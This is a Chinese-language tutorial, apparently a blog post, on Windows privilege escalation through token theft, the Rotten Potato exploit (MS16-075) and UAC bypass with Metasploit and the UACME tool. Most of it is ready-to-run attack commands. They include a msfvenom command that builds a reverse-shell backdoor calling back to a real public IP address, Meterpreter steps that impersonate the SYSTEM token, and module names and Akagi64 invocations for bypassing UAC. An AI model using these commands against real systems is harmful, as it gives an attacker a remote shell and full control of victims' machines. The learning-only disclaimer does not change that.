免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等...
目录
一.令牌窃取
操作:
1-生成-->上传后门后,让msf上线
2-执行命令
二.烂土豆(MS16-075)
操作:
1-先让MSF上线
2-上传烂土豆
3-执行命令
三.UAC(用户账户控制)
1-MSF模块提权
2-UACME 项目(yyds)
本地--->system
一.令牌窃取
令牌窃取: Win2008 Win2012
假冒令牌可以假冒一个网络中的另一个用户进行各类操作。
所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击.
操作:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=39.105.154.133 LPORT=8888 -f exe -o msf.exe
getuid
use incognito
list_tokens -u #展示令牌
impersonate_token "NT AUTHORITY\SYSTEM" #窃取令牌
1-生成-->上传后门后,让msf上线
2-执行命令
二.烂土豆(MS16-075)
---与令牌窃取差不多.
操作:
1-先让MSF上线
2-上传烂土豆
3-执行命令
getuid
pwd
cd C:// //到烂土豆目录下.
execute -cH -f ./potato.exe //执行烂土豆
use incognito //窃取令牌模块
list_tokens -u //查看可以窃取权限
impersonate_token "NT AUTHORITY\SYSTEM" //窃取权限
三.UAC(用户账户控制)
快速定位命令: msconfig
为了远程执行目标的 exe 或者 bat 可执行文件绕过此安全机制,以此叫 BypassUAC .
绕过项目:MSF 内置,Powershell 渗透框架,UACME 项目(推荐).
开启 UAC 和 未开启 UAC 时,MSF 默认 getsystem 提权影响(进程注入).
1-MSF模块提权
----先让MSF上线.
msf先上线
getuid
getsystem #遇到UAC就不行了.-->用模块
search uac
uac没开---getsystem直接成功
uac开了 (win7)
use exploit/windows/local/bypassuac
--成功
uac开了(默认状态) (win10)
上面的模块就不行了
use exploit/windows/local/ask
--这个模块需要靶机点击是才能成功.(条件苛刻)
自动化:
use exploit/windows/local/bypassuac_sluihijack
--成功
use exploit/windows/local/bypassuac_silentcleanup
--成功
2-UACME 项目(yyds)
GitHub - hfiref0x/UACME: Defeating Windows User Account Control
---该项目需要反编译一下,然后再上传运行.
--先让MSF上线
#反编译之后--->上传Akagi64.exe-->命令执行
Akagi64.exe 41 msf.exe (前面为反编译好的软件,中间值为模式的选择,最后为后门路径)(76种)
Akagi64.exe 编号 调用执行
#原理:以UAC项目运行后门,进行绕过
getuid
getsystem